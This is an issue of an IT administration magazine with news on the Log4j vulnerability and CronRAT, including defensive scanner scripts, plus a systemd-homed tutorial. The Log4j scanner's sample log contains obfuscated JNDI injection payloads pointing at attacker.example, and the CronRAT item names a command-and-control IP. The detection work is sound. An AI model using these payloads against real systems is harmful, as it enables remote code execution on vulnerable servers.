Admin Network & Security - Issue 67, 2022

ADMIN Network & Security
ISSUE 67
FREE DVD

Tracking MITM
systemd Security

systemd Security
Tricks for locking down your system

VMware Workspace ONE
A secure and user-friendly digital workplace

What’s New in Windows Terminal
Clickable links and other command-line innovations

Processor and Memory Affinity Tools

Man-in-the-Middle Attacks
Track down the culprit with Wireshark

Zero Trust Security Strategy

Nitrokey
Hardware-enhanced security

DMARC
Secure email communication

Endpoint Security for Windows 10

MITRE ATT&CK and D3FEND
Knowledge databases

Gatling
Generate load on servers and services

WWW.ADMIN-MAGAZINE.COM
Welcome to ADMIN

Technology Conferences: We Need Each Other
Technology conferences allow us to exchange ideas, discuss solutions, learn new
things, and geek out. Most of all, they give us that human connection we can’t get
in video chats or from email and text messages.

I think the primary thing that the pandemic has taught us, if nothing else, is that we miss
each other. We miss gathering. We miss discussing. We miss learning. And we miss clinking
glasses. Technology conferences gave us technonerds everything we could want in the latest
in technology: the learning opportunities, the gathering of like minds, the toasting with beer
glasses, and the geeking out over someone in a Storm Trooper costume or a modified DeLorean.
Tech conferences gave us what we need most: each other.
As a non-monetized sideline, I perform weddings. I’ve only done a few, but I’d love to do more. I customize
the wedding for each couple. I make them personal, and the focus is 100 percent on the two people getting
married. That’s why, in part, I’ve never been able to deliver the message I feel describes our need for each
other. The story is short, simple, and beautiful.
Whether you believe that an all-powerful God drew us out of the earth or that lightning struck a pool of chemicals
some half billion years ago, the first gift given to us was life itself, and the second gift was that of each other.
Since those first two one-celled organisms huddled together in the darkness, we have needed each other.
Technology conferences satisfy our need to gather. Zoom calls and virtual meetings just don’t have the same
effect on our psyches. Sure, we can see each other’s faces, we can discuss business, we can share lunches, and
we can cover a multitude of topics, but when we look around the room, we are still alone. We all know that
isolation isn’t healthy, but during a pandemic the opposite, at least physically, is true.
I need to speak directly to a person in a booth. I need to pick and choose my swag. I need to tell my favorite
joke when I have the opportunity to introduce a speaker. I need to covet the T-shirt I didn’t get. I need to ask
questions during a breakout session. I need to sit down uncomfortably at a table full of strangers at lunch time
and wait for an opening in the ongoing conversation to satisfy my need to interact with other humans. I’m
one of those people who wants to know where everyone is from, what you do, and what your hobbies are. I
don’t know why. I either find myself being terribly shy and withdrawn or so outgoing that I become the glue
of a random group. It’s weird, but I must interact.
I have worked from home for so long that my internal filter and whatever boundaries are supposed to exist have
eroded away along with some of my manners. I seem to speak almost in chat style now. No, I don’t say, “LOL,”
but my conversational style and tone are instant messaging-esque. I’m sure you understand that statement,
having worked remotely yourself.
I like working from home. I really do. I always hated going into an office. I prefer solitary time when I work so
that I can accomplish my tasks without interruption or distraction. As you all know, people in an office can be
very distracting. There’s always an off-topic discussion to focus on, a “Where’s lunch today?” question, or some
object being tossed between two or more coworkers. I like the interaction, but I also don’t want to work an
extra two or three hours a day to make up for my lack of productivity because of it.
Technology conferences are an escape from the grind. They give us a chance to connect with people who
aren’t our coworkers. They provide an outlet for the discussions we often don’t get to have in our own jobs.
We can ponder the “what ifs” and hypothetical situations together. We can also learn from each other. “Hey,
how do you deal with X?” is always a good conversation starter. Maybe it’s just me, but I’ve learned almost as
much through lunch table discussions as I have from the breakout sessions. That one-to-one interaction is far
more valuable than the cost of the conference. I always return to my cubicle or my home office energized and
ready to try new things, improve old things, or interact with my newfound friends.
We need each other. It’s in our genetic makeup. We need technology conferences. The predictions of conferences
becoming extinct are exaggerated. As long as there are technology jobs, there will be a need for tech
conferences. We need each other.

Ken Hess • ADMIN Senior Editor
Table of Contents

ADMIN Network & Security

Features
This issue, we look at how to secure systemd services and its associated components.

10  systemd-homed
    The Homed service sets up a portable home directory, and FIDO2 or PKCS#11 secure the stored files.
16  Interview: Lennart Poettering
    We talk to the primary systemd maintainer about the sense and purpose of some systemd features.
20  Container Security
    Two systemd container management functions – Nspawnd and Portabled – allow many programs to run more securely through isolation.
26  systemd-analyze
    This systemd utility determines the security of your system, letting you track how any service can be secured step-by-step in a sandbox.

Tools
Save time and simplify your workday with these useful tools for real-world systems administration.

30  BitLocker and PowerShell
    BitLocker provides current Windows versions a good, closely integrated encryption solution and lets you manage and maintain this feature with PowerShell.
34  Gatling
    Generate load on servers and services with this load-testing tool.
40  ThinLinc
    The revival of terminal servers during the COVID-19 crisis depended on the IT administrator to enable home office workplaces, with the help of tools like ThinLinc, a Linux remote desktop server.
43  Windows Terminal Preview
    The command prompt at the terminal is under active development and comes with a wide range of configuration options.
46  Processor Affinity Tools
    Get better performance from your nodes by binding processes and associating memory to specific cores.

Containers and Virtualization
Virtual environments are becoming faster, more secure, and easier to set up and use. Check out these tools.

52  Nutanix Community Edition
    The free Community Edition of the hyperconverged infrastructure is offered alongside its commercial product for those looking to take their first steps in the environment.
58  VMware Workspace ONE
    We look at the features, components, and architecture of this secure and user-friendly digital workplace.

IT Management
Use these practical apps to extend, simplify, and automate routine admin tasks.

78  eSIMs
    eSIM technology opportunities, deployment, and management for the mobile workplace.
80  Zero Trust
    We look into the principles of zero trust concepts and why zero trust models must replace endpoint security in local networks.

News
Find out about the latest ploys and toys in the world of information technology.

8   News
    • WhiteSource releases free Log4j detection tool
    • Critical RCE Zero Day vulnerability found in Apache library
    • The Linux Foundation to host the Cloud Hypervisor project
    • CronRAT malware targets Linux servers

Highlights

43  New features in Windows Terminal Preview
    Interesting features in the latest preview include state-preserving quick access to windows and configuration of settings in a GUI.
74  Endpoint Security for Windows 10
    Build 21H1 has numerous protection mechanisms that expand the list of security features and achieve an improved level of protection.

Security
Use these powerful security tools to protect your network and keep intruders in the cold.

62  DMARC
    Targeted configuration and the combined abilities of SPF and DKIM safeguard and protect against spam and phishing.
64  Nitrokey
    Hardware authentication devices raise data encryption, key management, and user authentication security to the next level.
70  MITM Analysis
    Wireshark and a combination of tools comprehensively analyze your security architecture.
74  Win 10 Endpoint Security
    We look at on-board protection mechanisms to delay updates and harden the operating system.

Nuts and Bolts
Timely tutorials on fundamental techniques for systems administrators.

86  MITRE ATT&CK & D3FEND
    These knowledge databases provide useful techniques for securing your IT infrastructure.
88  Optimizing X Window Displays
    Two command-line tools, xrandr and xinput, let you optimize your X Window display from the terminal.
90  Rescuing macOS Data
    macOS on-board tools and third-party applications can help prevent the loss of files and make security and backup your first priority.
94  Performance Dojo
    Compressed memory solutions for small memory problems.

Service
3   Welcome
4   Table of Contents
6   On the DVD
97  Back Issues
98  Call for Papers
On the DVD

Fedora 35 Server (Install)

The Fedora community delivers a short-lifecycle server operating system for seasoned system administrators with the latest technologies available in the open source community. Fedora Server boasts:
• Modularity – keep your stacks and software, even when your OS upgrades to a newer version.
• Easy administration – view and monitor system performance and status and deploy and manage container-based services with Cockpit.
• Advanced features – create your enterprise domain with advanced identity management, DNS, certificate services, and Windows domain integration.

Resources
[1] ChangeSet: https://fedoraproject.org/wiki/Releases/35/ChangeSet
[2] Distribution-wide changes: https://docs.fedoraproject.org/en-US/fedora/f35/release-notes/sysadmin/Distribution/
[3] Release notes: https://docs.fedoraproject.org/en-US/fedora/f35/release-notes/

Defective DVD? Defective discs will be replaced; email: [email protected]
While this ADMIN magazine disc has been tested and is to the best of our knowledge free of malicious software and defects, ADMIN magazine cannot be held responsible and is not liable for any disruption, loss, or damage to data and computer systems related to the use of this disc.
News for Admins

WhiteSource Releases Free Log4j Detection Tool

As the Log4j vulnerability continues to wreak havoc on the IT landscape, everyone is trying to prevent disaster from striking. A number of companies and development teams have released tools to help with the detection and remediation of the vulnerability. One such company is WhiteSource. Their new tool, Log4j Detect (https://github.com/whitesource/log4j-detect-distribution), is an open source command-line utility that scans your projects to detect the following known CVEs:
• CVE-2021-45046
• CVE-2021-44228
• CVE-2021-4104
• CVE-2021-45105
Once the scan is complete, it reports the exact path of the vulnerable files as well as the fixed version you need to remediate the issue. Log4j Detect should be run within the root directory of your project and also searches for vulnerable files with both the .jar and .gem extensions. It supports the Gradle, Maven, and Bundler package managers.
For Log4j Detect to run properly, you need to install either Gradle (if the project is a Gradle project) or mvn (if the project is a Maven project). The developers have also indicated that both Maven and Bundler projects must be built before scanning. Once you have Log4j Detect installed, the scan can be issued with the command log4j-detect scan -d PROJECT (where PROJECT is the directory housing your project).
For more information about this tool, make sure to read through the project README (https://github.com/whitesource/log4j-detect-distribution/blob/main/README.md).

Critical RCE Zero Day Vulnerability Found in Apache Library

Chen Zhaojun, from the Alibaba Cloud Security team, recently reported to the Apache Foundation that an Apache library (Log4j) contained a vulnerability that allows attackers who control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
This vulnerability (CVE-2021-44228, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228) affects Log4j 2 versions 2.0-beta9 through 2.14.1 and received the maximum possible CVSS score of 10.0.
The Log4j library is in wide use with enterprise Java software, so it’s imperative that anyone using it upgrade to Log4j v2.15.0. Note that 2.15.0 was itself followed by further fixes for CVE-2021-45046 and CVE-2021-45105, both of which the WhiteSource tool described above already detects, so apply the latest available release rather than stopping at 2.15.0.
John Hammond, a senior security researcher with Huntress, warned, “If your organization uses Apache log4j, you should upgrade to log4j-2.1.50.rc2 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your vendors push security updates out for their affected products.”
Even printers and CCTV systems are at risk. A new GitHub project (https://github.com/YfryTchsGD/Log4jAttackSurface) has been created to map out potentially affected manufacturers and components.
This vulnerability should not be taken lightly. If you use the Log4j library, make sure you start taking steps immediately to mitigate any risk to your company, your clients, and your data.
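The lookup mechanism that makes CVE-2021-44228 exploitable also leaves a recognizable trace in whatever an attacker can get logged (User-Agent strings, form fields, headers), and the usual evasion is to assemble the word jndi from nested lookups such as ${lower:j} or ${::-j} so that a plain grep for ${jndi: misses it. The Python below is an added example for this news item, not code from WhiteSource, Huntress, or the Log4j project: it unwraps those nested lookups one layer at a time and flags a line as soon as a JNDI lookup becomes visible. The log lines are constructed for the example, and attacker.example is a placeholder host.

```python
import re

# Innermost case-folding lookups, e.g. ${lower:J} -> j, ${upper:n} -> N.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost default-value lookups: ${name:-default} yields the default when the
# name does not resolve, so ${::-j} is simply "j".
_DEFAULT_LOOKUP = re.compile(r"\$\{([^${}]*):-([^${}]*)\}")
# Log4j lookup prefixes are matched case-insensitively, so ${JNDI: counts too.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def unwrap_once(text):
    """Resolve one layer of lower/upper/default-value lookups (innermost only)."""
    text = _CASE_LOOKUP.sub(
        lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
        text)
    return _DEFAULT_LOOKUP.sub(lambda m: m.group(2), text)


def contains_jndi_lookup(line, max_layers=10):
    """True if the line holds a JNDI lookup, plainly or after unwrapping up to
    max_layers layers of obfuscation. The check runs before every unwrap step, so
    a lookup such as ${jndi:ldap://h/a:-x} is caught before the default-value
    rule could rewrite it away."""
    text = line
    for _ in range(max_layers):
        if _JNDI.search(text):
            return True
        unwrapped = unwrap_once(text)
        if unwrapped == text:
            return False
        text = unwrapped
    return bool(_JNDI.search(text))


def scan_log(lines):
    """Return (line_number, line) for every line carrying a JNDI lookup."""
    return [(n, l) for n, l in enumerate(lines, start=1) if contains_jndi_lookup(l)]


# Constructed access-log lines for this example; attacker.example is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 512 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 512 "${${lower:j}${upper:n}di:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.7 - - "GET /?q=${lower:Hello} HTTP/1.1" 200 77 "curl/7.79"',
]

if __name__ == "__main__":
    for number, line in scan_log(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Run against a real access log, the scanner reports lines 2, 3, and 4 of the sample and ignores the harmless ${lower:Hello} on line 5. It is a triage aid, not a fix: a hit tells you an exploitation attempt reached a component that may log the field, and only the library upgrade above removes the exposure.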

The Linux Foundation to Host the Cloud Hypervisor Project

Backed by several powerhouses in the tech industry, The Linux Foundation is set to host a virtual machine monitor (VMM) built specifically for modern cloud workloads. The Cloud Hypervisor VMM is written in Rust, focuses on security, supports CPU, memory, and device hot plug, runs both Linux and Windows guests with a minimal footprint, and supports device offload with vhost-user.
The backers of this new platform include Alibaba, ARM, Intel, and Microsoft. According to Arjan van de Ven, fellow at Intel, “Cloud Hypervisor has grown to the point of moving to the neutral governance of The Linux Foundation.” He continues, “We created the project to provide a more secure and updated VMM to optimize for modern cloud workloads. With fewer device models and a modern, more secure language, Cloud Hypervisor offers security and performance-optimized for today’s cloud needs.”
Of the new project, Gerry Liu, senior staff engineer at Alibaba, said, “Cloud Hypervisor is a great innovation project and evolves rapidly. Moving it to Linux Foundation will help to build a stronger community and speed up the adoption.”
Find out more from the official Linux Foundation announcement (https://www.linuxfoundation.org/press-release/linux-foundation-to-host-the-cloud-hypervisor-project-creating-a-performant-lightweight-virtual-machine-monitor-for-modern-cloud-workloads/).

CronRAT Malware Targets Linux Servers

Security researchers at Sansec (https://sansec.io/research/cronrat) have found a new stealth attack that targets Linux servers and uses a nonexistent calendar day to stay off the radar. This Remote Access Trojan (RAT) masks the actions of the attack by using the date February 31 and targets Linux-based web stores to trigger online payment skimmer threats.
The new CronRAT attack can execute fileless malware, launch malware in separate subsystems, contact a control server disguised as a Dropbear SSH service, hide payloads in legitimate cron tasks, and run anti-tampering commands. CronRAT bypasses browser-based security scans and has already been discovered in live online stores. The threat was injected into servers via a Magecart (payment skimming) attack.
This attack is possible because cron only validates the syntax of the schedule fields, not whether the resulting date can ever occur. The crontab date specification CronRAT uses is 52 23 31 2 3, which would generate a runtime error upon execution. However, that runtime will never happen, because the date doesn’t exist.
Once CronRAT is executed, it contacts a Command and Control (C2) server at IP address 47.115.46.167:443 using a fake banner for the Dropbear SSH service. The payloads of the commands are obfuscated with multiple layers of compression and Base64 encoding.
CronRAT is considered a serious threat to Linux e-commerce servers and has managed to bypass most detection algorithms. Sansec had to rewrite its algorithm to catch this dangerous threat.
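The hiding trick relies on cron accepting a schedule whose day-of-month can never occur in the given month, and a defender can screen crontabs for exactly that. The Python below is an added example, not Sansec’s detection code: it expands each entry’s day-of-month and month fields (lists, ranges, steps, and month names) and checks whether any combination exists in a real calendar. One caveat the report above does not mention: crontab(5) runs a job when either the day-of-month or the day-of-week matches if both fields are restricted, so under Vixie/cronie cron the entry 52 23 31 2 3 would still fire at 23:52 on Wednesdays in February even though February 31 never arrives. The function reports that separately. The sample crontab is constructed for this example; its paths are placeholders.

```python
MONTH_NAMES = {name: number for number, name in enumerate(
    ("jan", "feb", "mar", "apr", "may", "jun", "jul", "aug", "sep", "oct", "nov", "dec"), start=1)}
# Longest length each month can reach; February is 29 because leap years exist.
MAX_DAY = {1: 31, 2: 29, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}


def _to_int(token, names):
    token = token.strip().lower()
    return names[token] if names and token in names else int(token)


def expand_field(field, lo, hi, names=None):
    """Expand one crontab field ('*', lists, ranges, '/step', optional names) to a set."""
    values = set()
    for item in field.split(","):
        step = 1
        if "/" in item:
            item, step_text = item.split("/", 1)
            step = int(step_text)
        if item == "*":
            start, end = lo, hi
        elif "-" in item:
            start, end = (_to_int(t, names) for t in item.split("-", 1))
        else:
            start = _to_int(item, names)
            end = hi if step > 1 else start      # "5/2" means 5, 7, 9, ... up to the maximum
        if not (lo <= start <= end <= hi) or step < 1:
            raise ValueError(f"bad field {field!r}")
        values.update(range(start, end + 1, step))
    return values


def analyze_schedule(crontab_line):
    """Examine the date part of one crontab entry.
    impossible_date: no (day-of-month, month) pair in the entry exists in any year.
    fires_via_dow:   the job still runs anyway, because crontab(5) treats a restricted
                     day-of-week as an alternative to the day-of-month when both are restricted."""
    fields = crontab_line.split()
    if fields and fields[0].startswith("@"):          # @reboot, @daily, ... carry no date
        return {"impossible_date": False, "fires_via_dow": False}
    if len(fields) < 5:
        raise ValueError("expected five schedule fields")
    _minute, _hour, dom, month, dow = fields[:5]
    days = expand_field(dom, 1, 31)
    months = expand_field(month, 1, 12, MONTH_NAMES)
    impossible = not any(d <= MAX_DAY[m] for m in months for d in days)
    return {"impossible_date": impossible,
            "fires_via_dow": impossible and not dow.startswith("*")}


def suspicious_entries(crontab_text):
    """Yield (line, analysis) for entries whose day-of-month can never occur in that month."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                    # comments and VAR=value lines
        analysis = analyze_schedule(line)
        if analysis["impossible_date"]:
            yield line, analysis


# Constructed sample crontab (not from a real host). The third entry reuses the
# date specification Sansec reported for CronRAT; the paths are placeholders.
SAMPLE_CRONTAB = """
MAILTO=""
# legitimate housekeeping
*/15 * * * * /usr/local/bin/rotate-logs
0 3 1 * * /usr/local/bin/monthly-report
52 23 31 2 3 /var/tmp/.x/run
0 0 30 feb * /var/tmp/.y/run
0 0 29 2 * /usr/local/bin/leap-day-job
"""

if __name__ == "__main__":
    for line, analysis in suspicious_entries(SAMPLE_CRONTAB):
        note = "still fires via day-of-week" if analysis["fires_via_dow"] else "never runs"
        print(f"{note:28} {line}")
```

Feed it the output of crontab -l for each account plus the files under /etc/cron.d; an entry flagged with an impossible date deserves a look at its command regardless of whether it would ever fire, since a legitimate job has no reason to be scheduled that way.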

FEATURES: systemd-homed

Portable home directory with state-of-the-art security

Home, Sweet Home

The systemd Homed service makes it easy to move your home directory, and FIDO2 or PKCS#11 can secure the stored files. By Martin Loschwitz

Your home directory (~) stores personal data and configuration files for the programs you use (e.g., the Google Chrome or Firefox profile and the GTK configuration for the look and feel you prefer for the installed desktop). Moreover, your home directory also contains Thunderbird mail, your music collection, and your photos. Like your own home, the personal folder on a Linux system is typically a place you want to keep safe.
If you use more than one Linux computer, you will not find your personal files on all of these devices, and fixing this issue is by no means trivial. The question of what users can do to share their home directory efficiently with a variety of systems is not new. Systemd boss Lennart Poettering finally came up with a solution – Homed – that works on recent systems, relying on systemd in the background and making it possible for users to take an external disk with their home directories from machine A to machine B and on to machine C without getting into any trouble (Figure 1).
The whole systemd-homed setup is highly secure and efficient. Encryption with multifactor authentication is part of the overall package, as is dynamic user account creation. Although Homed does not support encryption and login with the TPM module, PKCS#11 and FIDO2 can be used.
In this article, I introduce Homed and look into its technical details. Before that, however, it will not hurt to look at the specific problems that Homed solves – all the more so because it will contribute in a fundamental way to understanding how Homed works.

Attempted Thus Far

For decades, the market has tried solutions from a wide variety of approaches that share your home directory with a variety of systems. Sometimes shared storage such as NFS or synchronization solutions such as rsync came into play. However, rsync requires a functioning network connection between systems. A company laptop that has to be connected to the VPN to get an Internet connection does not meet this condition, and you are inevitably left out in the cold. On the other hand, you could use Samba to resolve the issue, viewing Linux as something similar to a domain client in the Windows universe. None of these approaches really cornered the market.
The idea of the portable home directory assumes a few things that are not necessarily commonplace on Linux or POSIX-like operating systems in general. First is the problem of user management. If you are using an account named Martin on your system, you will want to use this name elsewhere, too, when you
use your mobile home directory. Of course, you can’t expect every Linux system in the world to have a preconfigured user account with a suitable name that is just waiting for someone to plug in an SSD with the appropriate home directory. Instead, you need the user account to be created explicitly.
To begin, a user account must be created on a system. When the system then detects that a mobile home directory exists for the respective user, it integrates it. Even here, systemd faces a challenge because before Homed it did not play a role in the system’s user management. Now, however, it has to be able to create users and groups.
The whole thing must also work the other way around. Imagine, say, publicly accessible systems that are intended for use by several people with portable home directories. It quickly becomes clear that the system also must be able to delete the user accounts it creates as soon as the user logs off and removes the disk with the storage. User accounts that cannot be disabled are not just useless, they are dangerous. IT history shows that old, forgotten accounts have been used in attack scenarios.

User IDs

Another factor plays a major role in the dynamic use of home directories: user IDs, although they are closely related to usernames. On Linux systems, the username is effectively only the human-readable variant of the user ID, which is assigned to the respective account at the system level. If you want the system to create a user dynamically after a disk has been plugged into a USB port, the process implicitly creates a user ID.
For a user ID (and, in parallel, a group ID), however, the Linux system records various parameters for each file (e.g., who owns it and who has access to it). This information lives in the filesystem, which means that it is also stored on the USB stick or SSD that contains the portable home directory. When the user plugs in an SSD, the UID on the system needs to match the ownership recorded on the USB stick. If this is not the case, a corrective mechanism is needed; otherwise, access to the files on the disk would fail permanently because of missing permissions.

Mandatory Encryption

Another must-have that, surprisingly, many users still do not have on their radar to this day is disk encryption. With many PCs and certainly with the vast majority of devices used professionally, the value of the data stored on the machine clearly exceeds that of the hardware. Even a top-of-the-range Thinkpad “only” costs a good $4,000 (about EUR3,600). However, if the blueprint for an innovative machine or the company’s current tax return is stored on the device and it falls into the wrong hands, somebody is in trouble. The damage caused by industrial espionage and damage to the company’s reputation can exceed the value of the hardware many times over.
Manufacturers have long since recognized this vulnerability. Microsoft, for example, offers BitLocker to encrypt all PC storage devices automatically in the background. Apple does the same with FileVault, and the popular Linux distributions now also rely on comprehensive encryption of storage devices, especially on desktops. An NVMe or SSD drive, of course, must also be encrypted if it contains most of the important information in your life.
How can a mobile storage device be encrypted securely in a meaningful way when it is not tied to one computer? A 64-digit password would provide some security, but it would fail to provide effective protection if no one could remember it. Encryption by means of a certificate or multifactor access control (e.g., FIDO2 in addition to the password) is more useful, preventing data leaks even if the stick and the password fall into the hands of a third party, as long as they don’t have the second authentication factor. However, if this kind of technical overhead is required to encrypt the device, then the token you rely on to do so can also be used to log the user onto the system.
Clearly, mobile home directories are a great idea, and they seem simple to implement in theory, but if you take an in-depth look at the technical challenges, disillusionment quickly sets in. Homed at least claims to address the challenges described above. How does it do this in detail, how does the user benefit from it, and what are the limits of the system?

Figure 1: M.2 SSDs (for high-performance storage in power-constrained devices) are so small and light that even large volumes of data can now be moved back and forth with ease, which allows home directories that are not tied to a single system.

Getting Started with Homed

The various desktop distributions are sufficiently up-to-date as to include Homed. The situation might not be as easy for more exotic systems such as Raspberry Pi OS. Often older systems such as Debian GNU/Linux “Buster” serve as a foundation, and the Homed version included is outdated and less than satisfactory. Of course, Debian GNU/Linux 11, alias “Bullseye,” has been released in the meantime, so there is hope of updates for these systems in the near future.
A sufficiently recent systemd automatically includes Homed; the homectl utility [1], which creates users, and the userdbctl query tool should be in place on the system. Clearly, systemd does not find the username automatically on the basis of plugged-in devices. Theoretically, it would be quite conceivable for Homed to create a suitable user account as soon as a device is plugged in, which would mean total flexibility for the home directory because it would then even be available on public terminals that support Homed. However, the developers have deliberately not taken this approach. Instead, Homed waits for the user to create the account,

  homectl create <user>

for which you need the rights of the root system administrator. Homed, therefore, is primarily designed for use cases in which the user is only sharing their personal directory between several systems over which they have full control.

Handling User IDs

Homed implements the process of creating and deleting user accounts, bypassing the existing system mechanisms (e.g., /etc/passwd and /etc/group). Instead, it taps into the dynamic authentication mechanisms with a separate pluggable authentication module (PAM), complementing the existing login system in the process. For the administrator, this means that if they want to use Homed on several systems to manage a central home directory, they can influence the user IDs with homectl parameters. In this way, you can ensure that the IDs of the users in question match on all participating systems, which is expressly recommended; otherwise, Homed will use a crude hack to keep things tidy: After login, Homed simply runs chown over the entire home directory and changes its contents to the user ID and group ID that the user has on the local system.
Assuming the user ID needs to be 2000 on all systems, the following command creates the user and adds some background information:

  $ homectl create martin \
      --real-name="Martin Loschwitz" \
      --uid=2000

In this case, a user named martin is a member of a group with the same name. Unlike before, however, the UID is not randomly selected by Homed but defined manually. Still unsolved is the problem with the user’s home directory. Homed has created this directory and encrypted it with Linux Unified Key Setup (LUKS), but this by no means makes it mobile.
Unless the user specifies otherwise, Homed uses LUKS to create an encrypted home directory: the LUKS image file lives in /home/<user>.home, is attached as a loop device, and is mounted at /home/<user>/ after the user has successfully logged in to the system – and only then. This behavior is fundamental to Homed: A user’s personal directory is only accessible while the user is logged in. As soon as the user’s last login session ends, systemd automatically unmounts the directory containing the user’s personal data and closes the LUKS device. A new login is mandatory to put it back into operation.

Truly Mobile Home Directories

Anyone who has ever dealt with encrypted volumes on Linux knows that working with LUKS and the like is not necessarily a pleasant experience. Homed takes a large part of the work off your hands by configuring LUKS in the background in line with your specifications – but without forcing you into direct contact with the LUKS tools themselves. Again, it is just a question of the right parameters for homectl to keep the user directory created by Homed off the local disk and put it on a USB stick instead.
Starting from the homectl command used before, the following command uses a USB stick to store the home directory:

  $ homectl create martin \
      --real-name="Martin Loschwitz" \
      --uid=2000 \
      --image-path=/dev/disk/by-id/usb-SanDisk_Ultra_4C530000060908106243-0:0

You need to modify the part after --image-path so that it references your USB stick by its unique device ID, as in the example. Homed again takes care of all the administrative work, starting by wiping the USB stick: all existing files on it are lost. Then it creates a partition table and proceeds to create a LUKS-encrypted Linux device. The USB stick is now genuinely portable. If the owner of the directory logs out of the system so that there is no longer a current session, Homed automatically closes the LUKS device. The user then simply unplugs the USB stick on which it resides and takes it to another device to log in with an account managed by Homed, which recognizes the home directory from the USB stick and automatically enables it on the new system.

PKCS and Tokens

Users created as shown by the examples in this article still do not have passwords, and no alternative login methods are specified, so they can’t log in at all. Fortunately, systemd offers far more options than mere passwords. The team led by Poettering has much to offer, and the biggest hurdle might be to combine the respective authentication device with the appropriate option when creating the user in Homed. For once, however, this is not down to systemd itself but to the multitude of standards and their options that already exist on the market for this task.
The two best known representatives of crypto keys are probably PKCS#11 and FIDO2. PKCS#11 is a slightly different standard; older YubiKeys (Figure 2) use it, but it will primarily be familiar from classic smartcards (Figure 3). If a smartcard or an older YubiKey is to be used to unlock the account, the biggest challenge is to identify the path (i.e., the URI) to the device on the system. Homectl at least offers a way out. The command

  homectl --pkcs11-token-uri=list

displays a list of all available tokens. For the command to find the device, the token must be plugged in at the time of the call.

Figure 4: More modern FIDO2 tokens can


also be connected to Homed. If you specify
Figure 3: PKCS#11-based authentication the right parameter when creating the user,
Figure 2: Older YubiKeys use older versions usually relies on physical smartcards. the FIDO2 key then unlocks the account,
of authentication tokens. © YubiKey © Cardomatic including the home directory. © Feitian
If you use an authenticator according to the FIDO2 standard instead (Figure 4), you need the --fido2-device= parameter, which also supports the list keyword, which brings to light a list of available devices along with their paths on the system. Additionally, the auto keyword works if only one device fits the bill. The entire call is then:

$ homectl create martin \
    --real-name="Martin Loschwitz" \
    --uid=2000 \
    --image-path=/dev/disk/by-id/usb-SanDisk_Ultra_4C530000060908106243-0:0 \
    --fido2-device=auto

The user created in this way has a personal directory on a USB stick and logs on to the system with an authentication device.

PKCS#11 Special Case

If you opt for PKCS#11 as your login method, you definitely need to remember that the YubiKey has to be set up before the Homed configuration. The ykman commands

ykman piv reset
ykman piv generate-key -a RSA4096 9d pubkey.pem
ykman piv generate-certificate --subject "Homed" 9d pubkey.pem

delete old keys from the device, create a new key in PIV slot 9d, generate the certificate required for the key, and load it onto the YubiKey. Check ykman piv info for the key algorithms your firmware accepts: YubiKey PIV firmware before 5.7 only offers RSA1024, RSA2048, ECCP256, and ECCP384, so you may need -a RSA2048 or -a ECCP256 in place of RSA4096. Recent ykman releases spell the two commands ykman piv keys generate and ykman piv certificates generate. Then,

rm pubkey.pem

removes the key file from the filesystem. After that, the login can be configured as described earlier.

Playing It Safe

The homectl command also supports the --recovery-key parameter. If you have ever dealt extensively with cryptography, you will be aware that if you lose the device for generating tokens or the original key, you can't access the data, no matter what you try. Good practice dictates generating an emergency key with the device and keeping it in a safe place. It is essential to protect the key against access by unauthorized persons because anyone who has the key can decrypt the encrypted volume; therefore, you should keep the key as a hard copy on paper in a safe place (e.g., a safe).

By appending the parameter --recovery-key=yes to the command for creating the user, you can make sure that Homed automatically creates a suitable key. The key is then displayed onscreen, once, and can be copied from there.

Retroactive User Changes

Regularly, not all the parameters you need are configured when a user is first created in Homed. For example, if you don't have a YubiKey or smartcard when you create a user, you won't be able to use them. The good news is that Homed lets you add details such as decryption devices and modify the details of an account after the event with the homectl update command.

If you want to enable PKCS#11-based or FIDO2-based authentication for an account, you can use either of:

homectl update martin --pkcs11-token-uri=auto
homectl update martin --fido2-device=auto

Because the commands and parameters are the same as when setting up the user, you avoid the need to learn new parameters.

Limits

Homed takes the promise of the mobile home directory quite seriously and implements it sensibly. Despite all the euphoria about the technology, users and admins should not forget that the principle is subject to technical limitations that even Homed cannot define away.

The most relevant limitation here is by no means on the Homed level but relates to the applications you use with your portable directory. The home directory will fill up with garbage relatively quickly if you use it on different systems with different distributions because the configuration files will then contain competing entries. For example, if you use Ubuntu 18.04 on one system and Ubuntu 21.04 on the other, you will find different KDE versions on the two distributions. If you plug the home directory of the KDE version from Ubuntu 18.04 into the computer with Ubuntu 21.04, KDE will find the old configuration files and convert them accordingly. However, the return route is blocked: KDE on Ubuntu 18.04 cannot understand the new configuration and, in the worst case, will create a completely new one.

The problems become even more obvious when you imagine different systems or distributions. A home directory from openSUSE Leap is unlikely to harmonize with Raspbian as used on a Raspberry Pi.

If you want to avoid compatibility problems, you need to take manual steps to prevent some files ending up in your home directory, which has the unpleasant side effect that you then have to configure your own desktop again on every system you use. Alternatively, you can take care to use the shared home directory only on systems that are mutually compatible in the broadest sense.

Info
[1] homectl: https://www.freedesktop.org/software/systemd/man/homectl.html

The Author
Freelance journalist Martin Gerhard Loschwitz focuses primarily on topics such as OpenStack, Kubernetes, and Ceph.
